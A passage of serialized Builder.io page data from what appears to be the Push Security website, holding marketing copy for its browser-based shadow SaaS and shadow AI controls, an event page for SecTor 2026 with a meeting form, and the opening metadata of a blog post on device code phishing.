ends.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fc1ecc2d5d3814b62b072fac01827ff96",{"large":905},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":907,"meta":908,"component":909,"responsiveStyles":911},"builder-5e8ae39655274de89da32ab573a2525a",{"previousId":667},{"name":253,"options":910,"isRSC":118},{"darkMode":6},{"large":912},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":914,"component":915,"responsiveStyles":917},"builder-dfd6850cfb4741d2b8a0c16c2780f00a",{"name":315,"tag":315,"options":916,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":918},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":920,"@type":106,"tagName":131,"properties":921,"responsiveStyles":922},"builder-pixel-sa9l8kzicdd",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":923},{"height":1
24,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":925},{"path":31,"query":926},{},{},1770892908052,1745427419274,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb07017bfd318431690a5bb35bda35b99",[],{"kind":337,"breakpoints":933,"originalContentId":579,"winningTest":118,"lastPreviewUrl":934,"hasLinks":6,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},"https://pushsecurity.com/uc/incident-response?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=a9d5556e77f84a37b5bd52310a7110c1&builder.overrides.a9d5556e77f84a37b5bd52310a7110c1=a9d5556e77f84a37b5bd52310a7110c1&builder.overrides.use-case-page:/uc/incident-response=a9d5556e77f84a37b5bd52310a7110c1&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"createdDate":936,"id":937,"name":938,"modelId":159,"published":13,"query":939,"data":942,"variations":1047,"lastUpdated":1048,"firstPublished":1049,"testRatio":42,"screenshot":1050,"createdBy":43,"lastUpdatedBy":332,"folders":1051,"meta":1052,"rev":339},1746122471259,"5f118e24433d46ceb79f5099987156d7","Shadow SaaS",[940],{"@type":162,"property":163,"operator":164,"value":941},"/uc/shadow-saas",{"seoTitle":943,"seoDescription":944,"customFonts":945,"fontAwesomeIcon":950,"title":951,"jsCode":31,"tsCode":31,"blocks":952,"url":941,"state":1044},"Find and secure shadow SaaS","See and control shadow SaaS in the 
browser.",[946],{"kind":174,"variants":947,"files":948,"family":178,"version":172,"subsets":949,"lastModified":173,"category":198,"menu":197},[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"300italic":214,"500italic":209,"regular":210,"900italic":208,"italic":216,"100italic":211,"200italic":212,"600italic":217,"700italic":213,"800italic":215},[176,177],"faShieldCheck","Secure shadow SaaS",[953,1039],{"@type":106,"@version":107,"tagName":221,"id":954,"meta":955,"children":956},"builder-04da805c4cd34652a2db452fcda52e1d",{"previousId":833},[957,973,980,987,996,1006,1016,1026,1033],{"@type":106,"@version":107,"id":958,"meta":959,"component":960,"responsiveStyles":971},"builder-830d414faeaf41439142f9157e8288c8",{"previousId":837},{"name":225,"options":961,"isRSC":118},{"title":943,"description":962,"points":963,"video":970},"\u003Cp>SaaS sprawl is one of today’s fastest-growing security blind spots because most tools monitor around the edges. Push sees it at the source, in the browser, revealing every app users access, flagging risky tools, and helping you shut down exposure before it leads to a breach. No guesswork. No nasty surprises. 
Just real-time visibility and control.\u003C/p>",[964,966,968],{"item":965},"Discover every SaaS app users access, managed or not",{"item":967},"Spot accounts with weak security postures like missing MFA, unmanaged access, and no SSO",{"item":969},"Control usage with in-browser prompts, blocks, and security guardrails","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F3e4eece318d04d6586e691d59d0741cf%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=3e4eece318d04d6586e691d59d0741cf&alt=media&optimized=true",{"large":972},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":974,"meta":975,"component":976,"responsiveStyles":978},"builder-cd7833f966cb4c7e8adf0d6c979414a6",{"previousId":854},{"name":244,"options":977,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":979},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":981,"meta":982,"component":983,"responsiveStyles":985},"builder-49d720b45430454e8b08c526f267c19f",{"previousId":861},{"name":253,"options":984,"isRSC":118},{"darkMode":246},{"large":986},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":988,"component":989,"responsiveStyles":994},"builder-3dde0bf6c8544e5e9ab41b18a9d68034",{"name":258,"tag":258,"options":990,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":991,"description":992,"image":993,"reverse":6},"\u003Ch2>Use your browser to curb SaaS sprawl\u003C/h2>","\u003Cp>Shadow SaaS isn’t hiding in your network, it’s in your browser. From AI tools to unsanctioned file-sharing sites, security risks live in the apps your users sign into every day. 
Push maps your organization's true SaaS footprint in real time, exposing apps and accounts with unmanaged access, poor authentication, or no security oversight.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb6811a214c7949b6bbe0b9a3bca62efd",{"large":995},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":997,"meta":998,"component":999,"responsiveStyles":1004},"builder-e2420451ccdc4f088d0a4904cff45935",{"previousId":877},{"name":272,"options":1000,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":1001,"description":1002,"reverse":246,"image":1003},"\u003Ch2>Discover hidden SaaS usage\u003C/h2>","\u003Cp>Push captures live browser telemetry across every tab and session. Whether a user signs into a sanctioned app with a personal account or tries a new AI plugin, you’ll see it in real time, with no integrations or manual tagging.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe16e301f9af94665b95d98232a863d8a",{"large":1005},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":283,"marginTop":283},{"@type":106,"@version":107,"id":1007,"meta":1008,"component":1009,"responsiveStyles":1014},"builder-b36de7fce7994beea9e58d94662e7166",{"previousId":887},{"name":272,"options":1010,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":1011,"description":1012,"reverse":6,"image":1013},"\u003Ch2>Spot risky access and unsafe usage\u003C/h2>","\u003Cp>Discovery is just the beginning. Push flags apps with risky traits such as no MFA, no SSO, known vulnerabilities, or broad access scopes. 
You’ll know which tools introduce real risk, and which users are exposed so you can act with precision.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6585f3c242da4d70ae3cb7d02f481bef",{"large":1015},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":1017,"meta":1018,"component":1019,"responsiveStyles":1024},"builder-dc366b5134684fe7a508edf8913103ea",{"previousId":897},{"name":272,"options":1020,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":1021,"description":1022,"reverse":246,"image":1023},"\u003Ch2>Close gaps before they grow\u003C/h2>","\u003Cp>Push turns insight into action. When risky SaaS use is detected, guide users to enable MFA, block high-risk apps, or apply in-browser guardrails automatically. All without deploying new infrastructure or managing dozens of integrations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe6d60b6d91414819bc6258a318f00557",{"large":1025},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":1027,"meta":1028,"component":1029,"responsiveStyles":1031},"builder-8708f6f0d8da4b3f9e17bf16cda70219",{"previousId":907},{"name":253,"options":1030,"isRSC":118},{"darkMode":6},{"large":1032},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1034,"component":1035,"responsiveStyles":1037},"builder-8ff4b38d60534cf28cb523ab0f754875",{"name":315,"tag":315,"options":1036,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":1038},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":1040,"@type":106,"tagName":131,"properties":1041,"responsiveStyles":1042},"builder-pixel-eglk0rx2b8f",{"src":133,"aria-hidden":134,"alt":31,"role":135,"w
idth":124,"height":124},{"large":1043},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":1045},{"path":31,"query":1046},{},{},1770892936802,1746714967208,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F01bfb2304521412fbd2e1a1180904d40",[],{"originalContentId":817,"winningTest":118,"lastPreviewUrl":1053,"breakpoints":1054,"kind":337,"hasLinks":6,"hasAutosaves":6},"https://pushsecurity.com/uc/shadow-saas?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=5f118e24433d46ceb79f5099987156d7&builder.overrides.5f118e24433d46ceb79f5099987156d7=5f118e24433d46ceb79f5099987156d7&builder.overrides.use-case-page:/uc/shadow-saas=5f118e24433d46ceb79f5099987156d7&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":33,"medium":34},{"createdDate":1056,"id":1057,"name":1058,"modelId":159,"published":13,"query":1059,"data":1062,"variations":1166,"lastUpdated":1167,"firstPublished":1168,"testRatio":42,"screenshot":1169,"createdBy":43,"lastUpdatedBy":332,"folders":1170,"meta":1171,"rev":339},1764707470172,"b62629ce2f3741158d961cd10fe74b31","Shadow AI",[1060],{"@type":162,"property":163,"operator":164,"value":1061},"/uc/shadow-ai",{"fontAwesomeIcon":1063,"seoTitle":1064,"jsCode":31,"customFonts":1065,"title":1070,"tsCode":31,"seoDescription":1071,"blocks":1072,"url":1061,"state":1163},"faBrainCircuit","Secure AI 
native and AI enhanced apps. ",[1066],{"variants":1067,"category":198,"files":1068,"subsets":1069,"family":178,"kind":174,"menu":197,"lastModified":173,"version":172},[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"800italic":215,"regular":210,"700italic":213,"200italic":212,"italic":216,"500italic":209,"600italic":217,"300italic":214,"100italic":211,"900italic":208},[176,177],"Secure shadow AI","See and control shadow AI apps in the browser.",[1073,1158],{"@type":106,"@version":107,"tagName":221,"id":1074,"meta":1075,"children":1076},"builder-a6e5717a2c914d5695058e4ee201a05d",{"previousId":954},[1077,1093,1100,1107,1117,1126,1135,1145,1152],{"@type":106,"@version":107,"id":1078,"meta":1079,"component":1080,"responsiveStyles":1091},"builder-3e0ed678683f4a0eb7aa00253cf263b2",{"previousId":958},{"name":225,"options":1081,"isRSC":118},{"title":1070,"description":1082,"points":1083,"image":1090},"\u003Cp>Your employees are adopting AI faster than you can track it. From native features in corporate apps to unapproved shadow tools, it’s all happening in the browser. 
Push detects every AI interaction in real time, letting you categorize apps and enforce acceptable use policies in the browser.\u003C/p>",[1084,1086,1088],{"item":1085},"Map every AI tool used across your workforce",{"item":1087},"Review and classify apps by sensitivity, purpose, and policy status",{"item":1089},"Enforce AI usage rules directly in the browser","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F33cf153d920f4e389f3650253577cff7",{"large":1092},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":1094,"meta":1095,"component":1096,"responsiveStyles":1098},"builder-76968f8471d14893b8189d75b08fb426",{"previousId":974},{"name":244,"options":1097,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":1099},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":1101,"meta":1102,"component":1103,"responsiveStyles":1105},"builder-b55b9d4bc5a649d8839ce7f6c2043d95",{"previousId":981},{"name":253,"options":1104,"isRSC":118},{"darkMode":246},{"large":1106},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1108,"meta":1109,"component":1110,"responsiveStyles":1115},"builder-c3f38ef4d75d4989a29b5903175ed8a1",{"previousId":988},{"name":258,"tag":258,"options":1111,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":1112,"description":1113,"image":1114,"reverse":6},"\u003Ch2>Use your browser to govern AI \u003C/h2>","\u003Cp>The AI footprint inside your company is bigger than you think. From text generators to meeting assistants and design copilots, employees test, adopt, and connect new tools constantly. 
Push shows you those tools and which users are accessing them, without relying on network scans or API integrations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F30b43bda6f1644c19478fb1efa20050c",{"large":1116},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1118,"meta":1119,"component":1120,"responsiveStyles":1124},"builder-90ee9cb9afc44e7f885523715bf51a53",{"previousId":997},{"name":272,"options":1121,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":1122,"description":1123,"reverse":246,"image":1013},"\u003Ch2>Discover every AI tool users touch\u003C/h2>","\u003Cp>Push captures live telemetry from the browser, identifying every AI-native and AI-enhanced application users access. You’ll know which corporate identities are connected, how data flows, and what new AI apps appear across your environment. \u003C/p>",{"large":1125},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":283,"marginTop":283},{"@type":106,"@version":107,"id":1127,"meta":1128,"component":1129,"responsiveStyles":1133},"builder-9e44539fa53c4d8e87406036c921fc46",{"previousId":1007},{"name":272,"options":1130,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":1131,"description":1132,"reverse":6,"image":1023},"\u003Ch2>Classify and manage AI risk\u003C/h2>","\u003Cp>For apps you choose to allow, Push lets you apply custom in-browser banners. You can bulk-select categories of AI tools and require users to read and acknowledge your acceptable use policy before they proceed. 
This creates an auditable trail and moves policy from an easy-to-forget document to an active, in-workflow control.\u003C/p>",{"large":1134},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":1136,"meta":1137,"component":1138,"responsiveStyles":1143},"builder-44c1a891926f4bdeaaa37e90721fe6ac",{"previousId":1017},{"name":272,"options":1139,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":1140,"description":1141,"reverse":246,"image":1142},"\u003Ch2>Enforce your AI policy in the browser\u003C/h2>","\u003Cp>When an AI tool is deemed non-compliant or too risky, Push blocks it at the source. The block happens directly in the browser, preventing the user from accessing the site or submitting data. This gives you an immediate, powerful lever to stop data exfiltration and enforce a hard line on unacceptable risk.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa359ac1805af4e15a8a7f84632b9bb55",{"large":1144},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":1146,"meta":1147,"component":1148,"responsiveStyles":1150},"builder-dcc906f9cbe54dc68b3c672668e7a38f",{"previousId":1027},{"name":253,"options":1149,"isRSC":118},{"darkMode":6},{"large":1151},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1153,"component":1154,"responsiveStyles":1156},"builder-d2d64780c31b4349bc75805b23a07e38",{"name":315,"tag":315,"options":1155,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":1157},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":1159,"@type":106,"tagName":131,"properties":1160,"responsiveStyles":1161},"builder-pixel-bxhhzkqjopn",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":12
4},{"large":1162},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":1164},{"path":31,"query":1165},{},{},1770892957225,1764950077593,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe558b8b069884037a8e6904f7ecc029c",[],{"winningTest":118,"breakpoints":1172,"originalContentId":937,"kind":337,"lastPreviewUrl":1173,"hasLinks":6,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},"https://pushsecurity.com/uc/shadow-ai?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=b62629ce2f3741158d961cd10fe74b31&builder.overrides.b62629ce2f3741158d961cd10fe74b31=b62629ce2f3741158d961cd10fe74b31&builder.overrides.use-case-page:/uc/shadow-ai=b62629ce2f3741158d961cd10fe74b31&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"createdDate":1175,"id":1176,"name":1177,"modelId":1178,"meta":1179,"query":1183,"data":1186,"variations":1233,"lastUpdated":1234,"testRatio":42,"screenshot":1235,"createdBy":53,"lastUpdatedBy":53,"folders":1236,"published":13,"firstPublished":1237,"rev":1238},1775507978857,"fe87fe4ed49e46538702183037ff8688","SecTor 
2026","1c777f9969064926b1250dd130dcb0d2",{"breakpoints":1180,"originalContentId":1181,"hasAutosaves":246,"lastPreviewUrl":1182,"winningTest":118,"hasLinks":6,"kind":337},{"xsmall":57,"small":33,"medium":34},"4af42b108760494a870a9ea307ebf565","https://pushsecurity.com/events/sector-2026?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests%2CmergePullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=events-pages&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.events-pages=fe87fe4ed49e46538702183037ff8688&builder.overrides.fe87fe4ed49e46538702183037ff8688=fe87fe4ed49e46538702183037ff8688&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",[1184],{"@type":162,"property":163,"operator":164,"value":1185},"/events/sector-2026",{"inputs":1187,"seoTitle":1188,"title":1189,"date":1190,"seoDescription":1193,"themeId":6,"cardImage":1194,"ogImage":1194,"blocks":1195,"url":1185,"state":1227},[],"Meet with Push Security at SecTor","Toronto, ON",{"startEventDate":1191,"endEventDate":1192},1791259200000,1791518340000,"Sit down with a Push expert to learn how the Push platform can defend your 
organization.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F18dd52ad78e84e09931a4017dce5c430",[1196,1212,1222],{"@type":106,"@version":107,"id":1197,"meta":1198,"component":1200,"responsiveStyles":1210},"builder-55b0aae98a60436397c41a99e0110de4",{"previousId":1199},"builder-1d79d05db5f04037b1e8e18627dc1aa4",{"name":1201,"tag":1201,"options":1202,"isRSC":118},"EventsFormContainer",{"workEmailOnly":6,"showRecaptchaText":246,"title":1188,"description":1203,"formTitle":1204,"prodFormId":1205,"successTitle":1206,"successDescription":1207,"segmentFriendlyName":1208,"segmentId":1209},"\u003Cp>\u003Cbr />\u003C/p>\n\u003Cp>Sit down with one of our experts to learn more about how the Push platform can defend your organization where attacks actually happen: in the browser.\u003C/p>\n\u003Cp>\u003Cbr />\u003C/p>\n\u003Cp>\u003Cimg src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0f82cc19e3f543f8a7e72f267c954819\" />\u003C/p>\n\u003Cdiv class=\"relative py-8 sm:px-5\">\n  \u003Cdiv class=\"text-center md:text-left text-[#9e9e9e] text-base mb-5\">Trusted by:\u003C/div>\n  \u003Cdiv class=\"justify-center md:justify-start flex flex-row flex-wrap items-center gap-x-8 sm:gap-x-10 gap-y-4\">\n    \n    \u003Cdiv class=\"trusted-image\">\n      \u003Ca href=\"https://sophos.com/\" target=\"_blank\" rel=\"noopener\">\u003Cimg width=\"140\" height=\"40\" alt=\"Sophos\" loading=\"lazy\" srcset=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6e3d8212521f4c2b890634c886b7eaa8 1x, https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6e3d8212521f4c2b890634c886b7eaa8 2x\" class=\"filter-white w-[120px] h-[40px] sm:w-[140px] sm:h-[40px] opacity-50\" src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6e3d8212521f4c2b890634c886b7eaa8\">\u003C/a>\n    \u003C/div>\n    \u003Cdiv class=\"trusted-image\">\n      \u003Ca 
href=\"https://gitlab.com/\" target=\"_blank\" rel=\"noopener\">\u003Cimg width=\"140\" height=\"40\" alt=\"Gitlab\" loading=\"lazy\" srcset=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbecdf8927c6a406ca0d7614e005dce03 1x, https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbecdf8927c6a406ca0d7614e005dce03 2x\" class=\"filter-white w-[120px] h-[40px] sm:w-[140px] sm:h-[40px] opacity-50\" src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbecdf8927c6a406ca0d7614e005dce03\">\u003C/a>\n    \u003C/div>\n    \u003Cdiv class=\"trusted-image\">\n      \u003Ca href=\"https://cribl.io/\" target=\"_blank\" rel=\"noopener\">\u003Cimg width=\"140\" height=\"40\" alt=\"Cribl\" loading=\"lazy\" srcset=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F1e9e8d388bc14597968d404fa0dd7f99 1x, https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F1e9e8d388bc14597968d404fa0dd7f99 2x\" class=\"filter-white w-[120px] h-[40px] sm:w-[140px] sm:h-[40px] opacity-50\" src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F1e9e8d388bc14597968d404fa0dd7f99\">\u003C/a>\n    \u003C/div>\n    \u003Cdiv class=\"trusted-image\">\n      \u003Ca href=\"https://www.greynoise.io/\" target=\"_blank\" rel=\"noopener\">\u003Cimg width=\"140\" height=\"40\" alt=\"greynoise\" loading=\"lazy\" srcset=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb99292e4117247a18ccaa247d0e834f3 1x, https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb99292e4117247a18ccaa247d0e834f3 2x\" class=\"filter-white w-[120px] h-[40px] sm:w-[140px] sm:h-[40px] opacity-50\" src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb99292e4117247a18ccaa247d0e834f3\">\u003C/a>\n    \u003C/div>\n    \u003Cdiv class=\"trusted-image\">\n      \u003Ca 
href=\"https://portswigger.net/\" target=\"_blank\" rel=\"noopener\">\u003Cimg width=\"140\" height=\"40\" alt=\"Portswigger\" loading=\"lazy\" srcset=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fd063a13264454d3ebcc9b8d91220cf5f 1x, https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fd063a13264454d3ebcc9b8d91220cf5f 2x\" class=\"filter-white w-[120px] h-[40px] sm:w-[140px] sm:h-[40px] opacity-50\" src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fd063a13264454d3ebcc9b8d91220cf5f\">\u003C/a>\n    \u003C/div>\n    \u003Cdiv class=\"trusted-image\">\n      \u003Ca href=\"https://thinkst.com/\" target=\"_blank\" rel=\"noopener\">\u003Cimg width=\"140\" height=\"40\" alt=\"Thinkst\" loading=\"lazy\" srcset=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F1ee4bf9428a04d23807c37149c65c242 1x, https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F1ee4bf9428a04d23807c37149c65c242 2x\" class=\"filter-white w-[120px] h-[40px] sm:w-[140px] sm:h-[40px] opacity-50\" src=\"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F1ee4bf9428a04d23807c37149c65c242\">\u003C/a>\n    \u003C/div>\n    \n  \u003C/div>\n\u003C/div>","Request a meeting","4735aca8-b197-4521-a96f-024b25759d4d","\u003Cp>Meeting request received\u003C/p>","\u003Cp>Thank you! 
We'll reach out to coordinate a Push expert meeting at the event.\u003C/p>","Request a Black Hat Meeting","request_a_meeting",{"large":1211},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1213,"meta":1214,"component":1216,"responsiveStyles":1220},"builder-8b5819ec4e9e478382a2d4674cdfd248",{"previousId":1215},"builder-c57afa4c7b344be096d1f740aef6f8c2",{"name":1217,"options":1218,"isRSC":118},"Custom Code",{"code":1219,"scriptsClientOnly":6},"\u003Cstyle>\n  .filter-white { filter: brightness(0) invert(1); }\n  .py-28 {display:none;}\n\u003C/style>\n",{"large":1221},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":1223,"@type":106,"tagName":131,"properties":1224,"responsiveStyles":1225},"builder-pixel-geljwlrgd5f",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":1226},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":1228},{"pathname":1185,"path":1229,"query":1232},[1230,1231],"events","sector-2026",{},{},1775508397062,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0bd2c1f93bab4cefbaa44426c1e03a95",[],1775570814295,"69g6o7tjq46",[1240,6657,9839,12932],{"_path":1241,"_dir":1242,"_draft":6,"_partial":6,"_locale":31,"sys":1243,"ogImage":118,"summary":1246,"title":1260,"subtitle":118,"metaTitle":1261,"synopsis":1262,"hashTags":118,"publishedDate":1263,"slug":1264,"tagsCollection":1265,"relatedBlogPostsCollection":1275,"authorsCollection":3777,"content":3781,"_id":6652,"_type":6653,"_source":6654,"_file":6655,"_stem":6656,"_extension":6653},"/blog/device-code-phishing","blog",{"id":1244,"publishedAt":1245},"5DmCqTU2Tg4adYScA5vT2x","2026-04-07T09:00:13.964Z",{"json":1247},{"data":1248,"content":1249,"nodeType":1259},{},[1250],{"data":1251,"content":1252,"nodeType":1258},{},[1253],{"data":1254,"marks":1255,"value":1256,"nodeType":
